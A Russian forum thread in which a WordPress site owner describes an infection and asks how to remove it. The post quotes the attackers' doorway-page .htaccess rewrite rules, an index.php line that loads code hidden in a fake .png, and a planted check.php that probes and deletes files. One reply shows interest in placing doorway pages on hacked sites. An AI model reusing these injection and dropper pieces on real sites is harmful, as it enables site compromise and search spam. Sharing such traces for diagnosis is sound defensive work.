Форум Сайтостроение Безопасность

Вирус на хостинге (симптомы - появление папки sitemaps с дорами и файлов log_s.png, logo_s.png, mb_s.png в wp-includes/images/media)

outtime
На сайте с 04.05.2008
Offline
197
outtime
1595

Помогите разобраться с вирусом, симптомы описаны в заголовке - это

появление папки sitemaps с дорами

и файлов log_s.png, logo_s.png, mb_s.png в wp-includes/images/media

Вот такие вставки в htaccess 

RewriteRule ^.*[-/]d(\d+)-.*$ index\.php?id=$1&%{QUERY_STRING} [L]
RewriteRule ^d(\d+)-.*$ index\.php?id=$1&%{QUERY_STRING} [L]
RewriteRule ^t(\d+)[-/].*[-/]d(\d+)-.*$ index\.php?id=$1-$2&%{QUERY_STRING} [L]
RewriteRule ^t(\d+)[-/]d(\d+)[-/].*$ index\.php?id=$1-$2&%{QUERY_STRING} [L]
RewriteRule ^d(\d+)[-/].*[-/]t(\d+)[-/].*$ index\.php?id=$2-$1&%{QUERY_STRING} [L]
RewriteRule ^d(\d+)[-/]t(\d+)[-/].*$ index\.php?id=$2-$1&%{QUERY_STRING} [L]
RewriteRule ^.*[-/]d(\d+)[-/]t(\d+)[-/].*$ index\.php?id=$2-$1&%{QUERY_STRING} [L]
RewriteRule ^.*[-/]d(\d+)[-/].*[-/]t(\d+)[-/].*$ index\.php?id=$2-$1&%{QUERY_STRING} [L]
RewriteRule ^.*[-/]t(\d+)[-/].*[-/]d(\d+)[-/].*$ index\.php?id=$1-$2&%{QUERY_STRING} [L]
RewriteRule ^.*[-/]t(\d+)[-/]d(\d+)[-/].*$ index\.php?id=$1-$2&%{QUERY_STRING} [L]

RewriteRule ^.*[-/]d(\d+)-.*$ index\.php?id=$1&%{QUERY_STRING} [L]
RewriteRule ^d(\d+)-.*$ index\.php?id=$1&%{QUERY_STRING} [L]
RewriteRule ^t(\d+)[-/].*[-/]d(\d+)-.*$ index\.php?id=$1-$2&%{QUERY_STRING} [L]
RewriteRule ^t(\d+)[-/]d(\d+)[-/].*$ index\.php?id=$1-$2&%{QUERY_STRING} [L]
RewriteRule ^d(\d+)[-/].*[-/]t(\d+)[-/].*$ index\.php?id=$2-$1&%{QUERY_STRING} [L]
RewriteRule ^d(\d+)[-/]t(\d+)[-/].*$ index\.php?id=$2-$1&%{QUERY_STRING} [L]
RewriteRule ^.*[-/]d(\d+)[-/]t(\d+)[-/].*$ index\.php?id=$2-$1&%{QUERY_STRING} [L]
RewriteRule ^.*[-/]d(\d+)[-/].*[-/]t(\d+)[-/].*$ index\.php?id=$2-$1&%{QUERY_STRING} [L]
RewriteRule ^.*[-/]t(\d+)[-/].*[-/]d(\d+)[-/].*$ index\.php?id=$1-$2&%{QUERY_STRING} [L]
RewriteRule ^.*[-/]t(\d+)[-/]d(\d+)[-/].*$ index\.php?id=$1-$2&%{QUERY_STRING} [L]

и такая добавка в index.php

//installbg
$rifilename='/home/---/----.ru/wp-includes/images/media/logo_s.png';
require("$rifilename");
//installend

В некоторых сайтах выявил файлы check.php в корне, с таким содержанием 

<?php
$RootDir = $_SERVER['DOCUMENT_ROOT'];
$filename = $RootDir.'/index.php';
echo $filename."</br>";
if (is_writable($filename)) {
  echo "<div style='color:green;font-weight:bold;'>The file is writable</div>";
} else {
  echo "<div style='color:red;font-weight:bold;'>The file is not writable</div>";
}
$filesize=abs(filesize($RootDir . "/index.php"));
if($filesize=='529'){
	echo "<div style='color:green;font-weight:bold;'>index is ok.</div>";
}else{
	$index = file_get_contents($RootDir ."/index.php");
	$index = str_replace("<?php","",$index);
	echo $index;
}
unlink("./index.html");
unlink("./index.htm");
rename("./index.html","./aaaa.html");
unlink("./check.php");

Вроде это тоже следы деятельности злоумышленников)

Заражаются сначала сайты на WP, после чего даже в сапомисных движках вылезают эти sitemaps, появляются файлы верификации Google и добавление владельца в гугле с такими входными данными

New owner for http://----.ru/

To owner of http://----.ru/,

Google has identified that huacaidai@gmail.com has been added as an owner of http://----.ru/.

Property owners can change critical settings that affect how Google Search interacts with your site or app. Ensure that only appropriate people have owner status, and that this role is revoked when it is no longer needed.

Может кто-то знает ответ, где эта гадость сидит и откуда взялась?

Сервис Айболит не нашел никого, проверка бэкапа файлов по касперскому тоже не дала результата...

Помогите плз :o

Предлагаю воспользоваться моими услугами корректора. Проверю и уберу все ошибки, поправлю грамматику и склонения, сделаю текст лучше и читабельнее. Высокая скорость работы, цена 20 р за 1000 символов.
S
На сайте с 30.09.2016
Offline
469
Sitealert
#1
outtime:
Может кто-то знает ответ, где эта гадость сидит

В файлах на сервере

outtime:
и откуда взялась?

Из интернета.

Более точного ответа никто не даст. В последующих ответах будет написано то же самое, только более обтекаемо.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#2
outtime:
симптомы описаны в заголовке

Симптомы не особо важно на самом деле :)

При любых (практически) симптомах мероприятия одинаковы - лечение.

См по ВП https://ru.stackoverflow.com/questions/777029/%D0%92%D0%B8%D1%80%D1%83%D1%81%D1%8B-%D0%B2-wordpress/777040#777040, но в целом это общее для всего.

Но если у тебя сайты не изолированы, то всё может быть очень плохо. Лочить (п 3.1) нужно сразу весь акк и чистить всё до упаду.

Айболитом в параноидальном режиме сканил?

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
R
На сайте с 27.12.2017
Offline
9
rdot
#3

а сами доры на лохах лезут щас? как раз думаю одну тему разлить по пирогам

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий